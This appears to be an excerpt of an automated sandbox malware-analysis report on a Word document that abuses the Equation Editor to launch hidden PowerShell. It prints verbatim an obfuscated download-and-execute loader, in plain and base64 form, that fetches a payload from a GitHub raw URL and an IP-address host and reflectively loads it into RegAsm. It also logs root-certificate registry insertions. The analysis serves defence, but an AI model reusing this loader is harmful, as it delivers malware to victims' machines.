Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.380118041.0000000000859000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: .Automation.pdb source: powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: ~WRF{D2609696-E762-447B-A02C-A86155954B70}.tmp.0.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENV:comspEc[4,15,25]-jOIN'') (('Ibpu'+'rl'+' = gzJhttps:'+'//'+'raw.'+'githubuser'+'cont'+'ent.com/NoDetec'+'t'+'On/NoD'+'etectO'+'n'+'/re'+'fs'+'/he'+'ads/m'+'ai'+'n/'+'De'+'tahNot'+'h-V.'+'tx'+'tg'+'zJ; Ib'+'pbase64'+'Con'+'tent ='+' (New'+'-'+'Obj'+'ect S'+'yst'+'em.Net'+'.Web'+'Client).Down'+'lo'+'adS'+'trin'+'g'+'(Ibpurl'+'); Ibpbinary'+'Content = '+'['+'Sy'+'stem.Convert]::Fro'+'mB'+'ase64'+'Strin'+'g(Ibpb'+'a'+'se64Co'+'ntent'+'); Ibpassembl'+'y = '+'[R'+'e'+'fl'+'ection'+'.Assembly]'+'::Load(Ibpbinary'+'C'+'o'+'ntent); [dnlib.IO.Home]:'+':VAI(p7jtxt.VG'+'FRR/001/02'+'.022.3.29'+'1'+'//'+':ptthp'+'7j,'+' p7'+'jdesativadop7j, p'+'7jde'+'sativ'+'adop7j,'+' p7'+'jdesativado'+'p7j'+', p7jRegAsm'+'p7j'+', p7'+'jp7j,p7'+'jp7j)').ReplaCe('gzJ',[STRIng][ChaR]39).ReplaCe('p7j',[STRIng][ChaR]34).ReplaCe('Ibp','$') )"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENV:comspEc[4,15,25]-jOIN'') (('Ibpu'+'rl'+' = gzJhttps:'+'//'+'raw.'+'githubuser'+'cont'+'ent.com/NoDetec'+'t'+'On/NoD'+'etectO'+'n'+'/re'+'fs'+'/he'+'ads/m'+'ai'+'n/'+'De'+'tahNot'+'h-V.'+'tx'+'tg'+'zJ; Ib'+'pbase64'+'Con'+'tent ='+' (New'+'-'+'Obj'+'ect S'+'yst'+'em.Net'+'.Web'+'Client).Down'+'lo'+'adS'+'trin'+'g'+'(Ibpurl'+'); Ibpbinary'+'Content = '+'['+'Sy'+'stem.Convert]::Fro'+'mB'+'ase64'+'Strin'+'g(Ibpb'+'a'+'se64Co'+'ntent'+'); Ibpassembl'+'y = '+'[R'+'e'+'fl'+'ection'+'.Assembly]'+'::Load(Ibpbinary'+'C'+'o'+'ntent); [dnlib.IO.Home]:'+':VAI(p7jtxt.VG'+'FRR/001/02'+'.022.3.29'+'1'+'//'+':ptthp'+'7j,'+' p7'+'jdesativadop7j, p'+'7jde'+'sativ'+'adop7j,'+' p7'+'jdesativado'+'p7j'+', p7jRegAsm'+'p7j'+', p7'+'jp7j,p7'+'jp7j)').ReplaCe('gzJ',[STRIng][ChaR]39).ReplaCe('p7j',[STRIng][ChaR]34).ReplaCe('Ibp','$') )"Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5JysnQycrJ28nKydudGVudCk7IFtkbmxpYi5JTy5Ib21lXTonKyc6VkFJKHA3anR4dC5WRycrJ0ZSUi8wMDEvMDInKycuMDIyLjMuMjknKycxJysnLy8nKyc6cHR0aHAnKyc3aiwnKycgcDcnKydqZGVzYXRpdmFkb3A3aiwgcCcrJzdqZGUnKydzYXRpdicrJ2Fkb3A3aiwnKycgcDcnKydqZGVzYXRpdmFkbycrJ3A3aicrJywgcDdqUmVnQXNtJysncDdqJysnLCBwNycrJ2pwN2oscDcnKydqcDdqKScpLlJlcGxhQ2UoJ2d6SicsW1NUUkluZ11bQ2hhUl0zOSkuUmVwbGFDZSgncDdqJyxbU1RSSW5nXVtDaGFSXTM0KS5SZXBsYUNlKCdJYnAnLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENV:comspEc[4,15,25]-jOIN'') (('Ibpu'+'rl'+' = gzJhttps:'+'//'+'raw.'+'githubuser'+'cont'+'ent.com/NoDetec'+'t'+'On/NoD'+'etectO'+'n'+'/re'+'fs'+'/he'+'ads/m'+'ai'+'n/'+'De'+'tahNot'+'h-V.'+'tx'+'tg'+'zJ; Ib'+'pbase64'+'Con'+'tent ='+' (New'+'-'+'Obj'+'ect S'+'yst'+'em.Net'+'.Web'+'Client).Down'+'lo'+'adS'+'trin'+'g'+'(Ibpurl'+'); Ibpbinary'+'Content = '+'['+'Sy'+'stem.Convert]::Fro'+'mB'+'ase64'+'Strin'+'g(Ibpb'+'a'+'se64Co'+'ntent'+'); Ibpassembl'+'y = '+'[R'+'e'+'fl'+'ection'+'.Assembly]'+'::Load(Ibpbinary'+'C'+'o'+'ntent); [dnlib.IO.Home]:'+':VAI(p7jtxt.VG'+'FRR/001/02'+'.022.3.29'+'1'+'//'+':ptthp'+'7j,'+' p7'+'jdesativadop7j, p'+'7jde'+'sativ'+'adop7j,'+' p7'+'jdesativado'+'p7j'+', p7jRegAsm'+'p7j'+', p7'+'jp7j,p7'+'jp7j)').ReplaCe('gzJ',[STRIng][ChaR]39).ReplaCe('p7j',[STRIng][ChaR]34).ReplaCe('Ibp','$') )"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5JysnQycrJ28nKydudGVudCk7IFtkbmxpYi5JTy5Ib21lXTonKyc6VkFJKHA3anR4dC5WRycrJ0ZSUi8wMDEvMDInKycuMDIyLjMuMjknKycxJysnLy8nKyc6cHR0aHAnKyc3aiwnKycgcDcnKydqZGVzYXRpdmFkb3A3aiwgcCcrJzdqZGUnKydzYXRpdicrJ2Fkb3A3aiwnKycgcDcnKydqZGVzYXRpdmFkbycrJ3A3aicrJywgcDdqUmVnQXNtJysncDdqJysnLCBwNycrJ2pwN2oscDcnKydqcDdqKScpLlJlcGxhQ2UoJ2d6SicsW1NUUkluZ11bQ2hhUl0zOSkuUmVwbGFDZSgncDdqJyxbU1RSSW5nXVtDaGFSXTM0KS5SZXBsYUNlKCdJYnAnLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENV:comspEc[4,15,25]-jOIN'') (('Ibpu'+'rl'+' = gzJhttps:'+'//'+'raw.'+'githubuser'+'cont'+'ent.com/NoDetec'+'t'+'On/NoD'+'etectO'+'n'+'/re'+'fs'+'/he'+'ads/m'+'ai'+'n/'+'De'+'tahNot'+'h-V.'+'tx'+'tg'+'zJ; Ib'+'pbase64'+'Con'+'tent ='+' (New'+'-'+'Obj'+'ect S'+'yst'+'em.Net'+'.Web'+'Client).Down'+'lo'+'adS'+'trin'+'g'+'(Ibpurl'+'); Ibpbinary'+'Content = '+'['+'Sy'+'stem.Convert]::Fro'+'mB'+'ase64'+'Strin'+'g(Ibpb'+'a'+'se64Co'+'ntent'+'); Ibpassembl'+'y = '+'[R'+'e'+'fl'+'ection'+'.Assembly]'+'::Load(Ibpbinary'+'C'+'o'+'ntent); [dnlib.IO.Home]:'+':VAI(p7jtxt.VG'+'FRR/001/02'+'.022.3.29'+'1'+'//'+':ptthp'+'7j,'+' p7'+'jdesativadop7j, p'+'7jde'+'sativ'+'adop7j,'+' p7'+'jdesativado'+'p7j'+', p7jRegAsm'+'p7j'+', p7'+'jp7j,p7'+'jp7j)').ReplaCe('gzJ',[STRIng][ChaR]39).ReplaCe('p7j',[STRIng][ChaR]34).ReplaCe('Ibp','$') )"Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002AF738 push es; iretd 2_2_002AF764
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002C651D push edx; ret 2_2_002C651F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002C6513 push edx; ret 2_2_002C6517
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002B8F60 push eax; retf 2_2_002B8F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002C9067 push ecx; ret 2_2_002C906B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002C9060 push ecx; ret 2_2_002C9063
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002BC264 pushad ; retn 002Bh2_2_002BC289
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002CA343 push ebx; iretd 2_2_002CA354
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002C6287 push edx; ret 2_2_002C628B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002C6291 push edx; ret 2_2_002C6293
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002BC3EE push A0002BC4h; ret 2_2_002BC3F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002B01F4 push eax; retf 2_2_002B01F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002BC2DA pushad ; retn 002Bh2_2_002BC2DD

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: ~WRD0000.tmp.0.drJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: ~WRD0000.tmp.0.drJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
